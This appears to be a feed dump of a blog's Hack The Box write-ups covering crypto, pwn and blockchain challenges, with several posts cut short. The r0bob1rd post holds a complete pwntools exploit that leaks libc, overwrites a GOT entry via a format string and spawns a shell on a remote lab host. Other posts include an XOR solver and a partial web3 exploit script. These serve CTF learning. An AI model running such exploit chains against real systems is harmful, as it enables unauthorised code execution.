style="display:flex;"><span>HTB{1_m1ght_h4v3_m3ss3d_uP_jU$t_4_l1ttle_b1t?} </span></span></code></pre></div></pagevault> /posts/htb-crypto-xorxorxor/ Fri, 27 Feb 2026 02:12:00 +0700 /posts/htb-crypto-xorxorxor/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> xorxorxor</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Decrypt XOR-encrypted flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The challenge encrypts flag bytes with a repeating random 4-byte key:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>xored[i] <span style="color:#f92672">=</span> flag[i] <span style="color:#f92672">^</span> key[i <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span>] </span></span></code></pre></div><p>HTB flags start with <code>HTB{</code>, so we can recover all 4 key bytes directly from the first 4 ciphertext bytes.</p> <h2 id="exploit-strategy">Exploit Strategy</h2> <ol> <li>Parse hex ciphertext.</li> <li>Compute key from known prefix <code>b'HTB{'</code>.</li> <li>XOR-decrypt the full ciphertext with repeating key.</li> </ol> <h2 id="solve-script-full-poc">Solve Script (Full PoC)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> argparse </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">xor_repeat</span>(data: bytes, key: bytes) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> bytes(b <span style="color:#f92672">^</span> key[i <span style="color:#f92672">%</span> len(key)] <span style="color:#66d9ef">for</span> i, b <span style="color:#f92672">in</span> enumerate(data)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>(): </span></span><span style="display:flex;"><span> ap <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser() </span></span><span style="display:flex;"><span> ap<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#39;--hex&#39;</span>, required<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;ciphertext hex from challenge output&#39;</span>) </span></span><span style="display:flex;"><span> args <span style="color:#f92672">=</span> ap<span style="color:#f92672">.</span>parse_args() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> ct <span style="color:#f92672">=</span> bytes<span style="color:#f92672">.</span>fromhex(args<span style="color:#f92672">.</span>hex) </span></span><span style="display:flex;"><span> known <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;HTB{&#39;</span> </span></span><span style="display:flex;"><span> key <span style="color:#f92672">=</span> bytes(ct[i] <span style="color:#f92672">^</span> known[i] <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">4</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pt <span style="color:#f92672">=</span> xor_repeat(ct, key) </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#39;key =&#39;</span>, key<span style="color:#f92672">.</span>hex()) </span></span><span style="display:flex;"><span> print(pt<span style="color:#f92672">.</span>decode(errors<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;ignore&#39;</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;__main__&#39;</span>: </span></span><span style="display:flex;"><span> main() </span></span></code></pre></div><h2 id="run">Run</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 solve.py --hex &lt;ciphertext_hex&gt; </span></span></code></pre></div><h2 id="result">Result</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{rep34t3d_x0r_n0t_s0_s3cur3} </span></span></code></pre></div></pagevault> /posts/htb-crypto-baby-time-capsule/ Fri, 27 Feb 2026 02:10:00 +0700 /posts/htb-crypto-baby-time-capsule/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Baby Time Capsule</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Recover the plaintext flag from repeated RSA encryptions under fresh moduli.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service keeps encrypting the <strong>same message</strong> with RSA exponent <code>e = 5</code>, but with different fresh moduli <code>(n_i)</code>.</p> <p>When we collect at least <code>e</code> ciphertexts from pairwise-coprime moduli, Håstad&rsquo;s broadcast attack applies:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>c_i = m^e mod n_i </span></span></code></pre></div><p>Using CRT, we reconstruct <code>m^e</code> over <code>N = ∏n_i</code>, then compute the exact integer 5th root.</p> /posts/htb-pwn-tictactoed/ Thu, 26 Feb 2026 17:00:00 +0700 /posts/htb-pwn-tictactoed/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> TicTacToed</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Unlock the hidden interface, pass authentication, and recover the flag from the embedded C2 workflow.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="initial-recon">Initial Recon</h2> <p>The challenge binary is a Rust ELF (PIE, Full RELRO, NX, no canary, not stripped), with useful symbols left intact.</p> <p>Important symbols during reversing:</p> <ul> <li><code>main</code></li> <li><code>check_winner</code></li> <li><code>validate_access_code</code></li> <li><code>decrypt_key</code></li> <li><code>ask_for_credentials</code></li> <li><code>execute_c2</code></li> </ul> <p>Key observations:</p> <ul> <li>A hidden path unlocks after a specific 5x5 tic-tac-toe win pattern.</li> <li>Auth is not random: input is SHA-256 checked against an embedded expected hash.</li> <li><code>decrypt_key</code> reconstructs the credential from 3 encrypted parts using XOR <code>^ 0x5a</code>.</li> <li>On successful auth, the binary drops and executes a second ELF (<code>/tmp/C2_executable</code>).</li> </ul> <h2 id="hidden-credential-recovery">Hidden Credential Recovery</h2> <p><code>decrypt_key</code> uses three encrypted byte arrays (<code>ENC_PART1/2/3</code>) and applies a transform closure equivalent to:</p> /posts/htb-pwn-portaloo/ Thu, 26 Feb 2026 15:25:00 +0700 /posts/htb-pwn-portaloo/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Portaloo</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Turn the portal manager bugs into code execution and recover the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="initial-recon">Initial Recon</h2> <p><code>checksec</code> profile:</p> <ul> <li>64-bit ELF</li> <li>PIE enabled</li> <li>Full RELRO</li> <li>Canary enabled</li> <li>NX enabled</li> <li>Not stripped</li> </ul> <p>Menu primitives:</p> <ol> <li>Create Portal</li> <li>Destroy Portal</li> <li>Upgrade Portal</li> <li>Peek into the Void</li> <li>Step into the portal</li> </ol> <p>Interesting functions from reversing:</p> <ul> <li><code>create_portal</code></li> <li><code>destroy_portal</code></li> <li><code>upgrade_portal</code></li> <li><code>peek_into_the_void</code></li> <li><code>step_into_the_portal</code></li> </ul> <h2 id="vulnerability-chain">Vulnerability Chain</h2> <h3 id="1-use-after-free-in-portal-slots">1) Use-After-Free in portal slots</h3> <p><code>destroy_portal</code> calls <code>free(slots[idx])</code> but does <strong>not</strong> clear the slot pointer. That leaves stale freed pointers reachable via other menu actions.</p> /posts/htb-pwn-evil-corp/ Thu, 26 Feb 2026 03:40:00 +0700 /posts/htb-pwn-evil-corp/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Evil Corp</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Exploit the support-message path to get code execution and recover the flag</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="initial-triage">Initial Triage</h2> <p>Binary: <code>evil-corp</code></p> <p><code>checksec</code>:</p> <ul> <li>64-bit ELF</li> <li>PIE enabled</li> <li>NX enabled</li> <li>Partial RELRO</li> <li>No stack canary</li> <li>Not stripped</li> </ul> <p>Key behavior:</p> <ul> <li>Program uses wide-char I/O (<code>fgetws</code>, <code>wcscmp</code>, <code>wcstol</code>, <code>wprintf</code>)</li> <li>Login credentials are hardcoded and checked with <code>wcscmp</code></li> <li>Menu option 2 (<code>ContactSupport</code>) is the vulnerable path</li> </ul> <p>Recovered credentials:</p> /posts/htb-pwn-r0bob1rd/ Wed, 25 Feb 2026 17:45:00 +0700 /posts/htb-pwn-r0bob1rd/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> r0bob1rd</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Gain shell and read flag from remote service</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="binary-recon">Binary Recon</h2> <p><code>checksec</code> and static triage show:</p> <ul> <li>64-bit ELF</li> <li>NX enabled</li> <li>Stack canary enabled</li> <li>Partial RELRO</li> <li>No PIE</li> <li>Not stripped</li> </ul> <p>Core issues in <code>operation()</code>:</p> <ol> <li><strong>Negative index OOB read</strong> on global <code>robobirdNames</code> table: <ul> <li>User-controlled index is used in pointer arithmetic around <code>.data/.got</code>.</li> <li><code>-8</code> maps to <code>setvbuf@got</code> and leaks libc pointer bytes.</li> </ul> </li> <li><strong>Format string vulnerability</strong>: <ul> <li>user input is passed directly to <code>printf(buf)</code>.</li> <li>Enables arbitrary write primitive via <code>%n</code> payloads.</li> </ul> </li> </ol> <h2 id="exploit-plan">Exploit Plan</h2> <ol> <li>Send index <code>-8</code> to leak <code>setvbuf@got</code> runtime address.</li> <li>Compute <code>libc_base = leak - libc.sym['setvbuf']</code>.</li> <li>Use FSB payload to overwrite <code>__stack_chk_fail@got</code> with a libc one_gadget.</li> <li>Overflow description (<code>fgets</code> into smaller stack buffer) to force canary failure.</li> <li>Canary check calls hijacked <code>__stack_chk_fail</code> =&gt; one_gadget =&gt; shell.</li> <li>Execute <code>cat /flag.txt</code>.</li> </ol> <h2 id="working-exploit-script">Working Exploit Script</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;amd64&#39;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;info&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>BIN <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;./r0bob1rd&#39;</span> </span></span><span style="display:flex;"><span>LIBC <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;./glibc/libc.so.6&#39;</span> </span></span><span style="display:flex;"><span>LD <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;./glibc/ld.so.2&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>HOST <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;154.57.164.74&#39;</span> </span></span><span style="display:flex;"><span>PORT <span style="color:#f92672">=</span> <span style="color:#ae81ff">32234</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(BIN, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>) </span></span><span style="display:flex;"><span>libc <span style="color:#f92672">=</span> ELF(LIBC, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">start</span>(remote_mode<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>): </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> remote_mode: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> remote(HOST, PORT) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> process([LD, BIN]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">solve</span>(io): </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Stage 1: OOB leak from setvbuf@got via negative index</span> </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&gt;&#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;-8&#39;</span>) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;sen: &#39;</span>) </span></span><span style="display:flex;"><span> leak_raw <span style="color:#f92672">=</span> io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>, drop<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>) </span></span><span style="display:flex;"><span> leak <span style="color:#f92672">=</span> u64(leak_raw[:<span style="color:#ae81ff">6</span>]<span style="color:#f92672">.</span>ljust(<span style="color:#ae81ff">8</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#39;</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> libc<span style="color:#f92672">.</span>address <span style="color:#f92672">=</span> leak <span style="color:#f92672">-</span> libc<span style="color:#f92672">.</span>sym[<span style="color:#e6db74">&#39;setvbuf&#39;</span>] </span></span><span style="display:flex;"><span> log<span style="color:#f92672">.</span>success(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;libc base = </span><span style="color:#e6db74">{</span>hex(libc<span style="color:#f92672">.</span>address)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># one_gadget candidates from bundled libc</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># 0xe3afe, 0xe3b01, 0xe3b04</span> </span></span><span style="display:flex;"><span> one <span style="color:#f92672">=</span> libc<span style="color:#f92672">.</span>address <span style="color:#f92672">+</span> <span style="color:#ae81ff">0xe3b01</span> </span></span><span style="display:flex;"><span> log<span style="color:#f92672">.</span>success(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;one_gadget = </span><span style="color:#e6db74">{</span>hex(one)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Stage 2: format-string overwrite</span> </span></span><span style="display:flex;"><span> payload <span style="color:#f92672">=</span> fmtstr_payload( </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">8</span>, </span></span><span style="display:flex;"><span> {elf<span style="color:#f92672">.</span>got[<span style="color:#e6db74">&#39;__stack_chk_fail&#39;</span>]: one}, </span></span><span style="display:flex;"><span> write_size<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;short&#39;</span> </span></span><span style="display:flex;"><span> )<span style="color:#f92672">.</span>ljust(<span style="color:#ae81ff">106</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\x90</span><span style="color:#e6db74">&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&gt;&#39;</span>, payload) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Give epilogue path a moment and then use shell</span> </span></span><span style="display:flex;"><span> sleep(<span style="color:#ae81ff">0.8</span>) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;echo __PWNED__&#39;</span>) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;id&#39;</span>) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;cat /flag.txt || cat flag.txt&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> out <span style="color:#f92672">=</span> io<span style="color:#f92672">.</span>recvrepeat(<span style="color:#ae81ff">2.0</span>) </span></span><span style="display:flex;"><span> print(out<span style="color:#f92672">.</span>decode(errors<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;ignore&#39;</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;__main__&#39;</span>: </span></span><span style="display:flex;"><span> io <span style="color:#f92672">=</span> start(remote_mode<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>) </span></span><span style="display:flex;"><span> solve(io) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>close() </span></span></code></pre></div><h2 id="notes">Notes</h2> <ul> <li>This target combines two bugs: the OOB leak provides stable libc base, while FSB gives arbitrary write.</li> <li>Partial RELRO keeps GOT writable, so <code>__stack_chk_fail@got</code> is a clean control-flow target.</li> <li>The canary is not bypassed; it is intentionally <strong>triggered</strong> to pivot into hijacked GOT.</li> </ul> <h2 id="result">Result</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{S0m3t1m3s_bl0w1ng_th3_pr0gr4m_1s_g00d} </span></span></code></pre></div></pagevault> /posts/htb-pwn-execute/ Wed, 25 Feb 2026 11:40:00 +0700 /posts/htb-pwn-execute/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Execute</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Execute shellcode despite blacklist restrictions and print flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Program reads user bytes and jumps to them directly:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> size <span style="color:#f92672">=</span> <span style="color:#a6e22e">read</span>(<span style="color:#ae81ff">0</span>, buf, <span style="color:#ae81ff">60</span>); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>(<span style="color:#f92672">!</span><span style="color:#a6e22e">check</span>(blacklist, buf, size, <span style="color:#a6e22e">strlen</span>(blacklist))) <span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">1337</span>); </span></span><span style="display:flex;"><span>((<span style="color:#66d9ef">void</span>(<span style="color:#f92672">*</span>)()) buf)(); </span></span></code></pre></div><p>The first-stage payload is filtered against blacklist bytes, but code execution is still intentional (<code>execstack</code>, NX disabled).</p> <p>Blacklist bytes include values from typical <code>/bin/sh</code> shellcode (<code>3b</code>, <code>2f</code>, <code>62</code>, <code>69</code>, <code>6e</code>, <code>73</code>, <code>68</code>, &hellip;), so a direct one-shot payload is blocked.</p> /posts/htb-pwn-restaurant/ Wed, 25 Feb 2026 11:35:00 +0700 /posts/htb-pwn-restaurant/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Restaurant</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Gain code execution and read the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The vulnerability is in <code>fill()</code>:</p> <ul> <li>local stack buffer is 0x20 bytes</li> <li><code>read(0, buf, 0x400)</code> allows stack overflow</li> <li>no canary + no PIE make RIP control straightforward</li> <li>NX is enabled, so we use ROP/ret2libc (no shellcode on stack)</li> </ul> <p>Security profile of binary:</p> <ul> <li>Full RELRO</li> <li>NX enabled</li> <li>No PIE</li> <li>No canary</li> </ul> <h2 id="exploit-strategy">Exploit Strategy</h2> <p>Use a two-stage chain:</p> /posts/htb-crypto-broken-decryptor/ Wed, 25 Feb 2026 05:35:00 +0700 /posts/htb-crypto-broken-decryptor/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Broken Decryptor</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Target:</strong> Recover server flag from encryption oracle behavior</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>This challenge combines two critical mistakes:</p> <ol> <li><strong>AES-CTR stream reuse</strong> with fixed <code>key</code> and <code>iv</code> for every encryption call.</li> <li><strong>Biased OTP generation</strong>:</li> </ol> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>otp <span style="color:#f92672">=</span> os<span style="color:#f92672">.</span>urandom(len(data))<span style="color:#f92672">.</span>replace(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\xff</span><span style="color:#e6db74">&#39;</span>) </span></span></code></pre></div><p>Replacing <code>0x00</code> means each byte position can only produce <strong>255 possible OTP values</strong>, not 256. That creates a forbidden-byte leak: after enough samples at one position, the single unseen byte is the hidden pre-OTP byte.</p> /posts/htb-crypto-mysterybox/ Wed, 25 Feb 2026 05:35:00 +0700 /posts/htb-crypto-mysterybox/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> mysterybox</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Forge a valid signature for the protected admin message and retrieve the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The server implements <strong>textbook RSA signatures</strong> directly over raw integers:</p> <ul> <li><code>sign(m) = m^d mod n</code></li> <li><code>verify(m, s)</code> checks <code>s^e mod n == m</code></li> </ul> <p>There is <strong>no hashing</strong> and <strong>no padding</strong> (e.g., no PKCS#1 v1.5/PSS). This makes signatures multiplicatively malleable:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sig(m1 * m2) = sig(m1) * sig(m2) mod n </span></span></code></pre></div><p>The app blocks signing the exact admin message, but it still signs related values, which is enough to forge an admin signature.</p> /posts/htb-blockchain-false-bidding/ Wed, 25 Feb 2026 01:43:00 +0700 /posts/htb-blockchain-false-bidding/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> False Bidding</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal condition:</strong> <code>TARGET.keyOwner() == player</code></li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-causes">Root Causes</h2> <ol> <li><strong>Bid threshold overflow</strong> in receive gate: <ul> <li>condition uses <code>uint64(msg.value) &gt;= 2 * topBidder().bid</code></li> <li>set top bid to $2^{63}$ ⇒ <code>2 * bid</code> wraps to <code>0</code> (in uint64 space)</li> </ul> </li> <li><strong><code>uint32 timeout</code> wraparound</strong>: <ul> <li>every accepted bid does <code>timeout += YEAR</code></li> <li>repeated increments overflow timeout below current timestamp</li> </ul> </li> </ol> <h2 id="exploit-plan">Exploit Plan</h2> <ul> <li>Become top bidder with <code>2^63</code> wei.</li> <li>Alternate zero-value bids between two EOAs (must satisfy <code>msg.sender != topBidder().addr</code>).</li> <li>Keep extending timeout until it wraps to past time.</li> <li>Claim prize as top bidder.</li> </ul> <h2 id="full-poc-script-pythonweb3">Full PoC Script (Python/web3)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> web3 <span style="color:#f92672">import</span> Web3 </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_utils <span style="color:#f92672">import</span> keccak </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_abi <span style="color:#f92672">import</span> decode </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_account <span style="color:#f92672">import</span> Account </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>BASE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http://&lt;INSTANCE_IP&gt;:&lt;PORT&gt;&#34;</span> </span></span><span style="display:flex;"><span>RPC <span style="color:#f92672">=</span> BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/rpc&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>info <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/connection_info&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>json() </span></span><span style="display:flex;"><span>PRIV <span style="color:#f92672">=</span> info[<span style="color:#e6db74">&#34;PrivateKey&#34;</span>] </span></span><span style="display:flex;"><span>PLAYER <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;Address&#34;</span>]) </span></span><span style="display:flex;"><span>TARGET <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;TargetAddress&#34;</span>]) </span></span><span style="display:flex;"><span>SETUP <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;setupAddress&#34;</span>]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>w3 <span style="color:#f92672">=</span> Web3(Web3<span style="color:#f92672">.</span>HTTPProvider(RPC)) </span></span><span style="display:flex;"><span>acctA <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>account<span style="color:#f92672">.</span>from_key(PRIV) </span></span><span style="display:flex;"><span>acctB <span style="color:#f92672">=</span> Account<span style="color:#f92672">.</span>create(<span style="color:#e6db74">&#34;false-bidding&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>sel_timeout <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;timeout()&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sel_top <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;topBidder()&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sel_claim <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;claimPrize()&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sel_solved <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;isSolved(address)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">call_u256</span>(to, sel): </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> int<span style="color:#f92672">.</span>from_bytes(w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({<span style="color:#e6db74">&#34;to&#34;</span>: to, <span 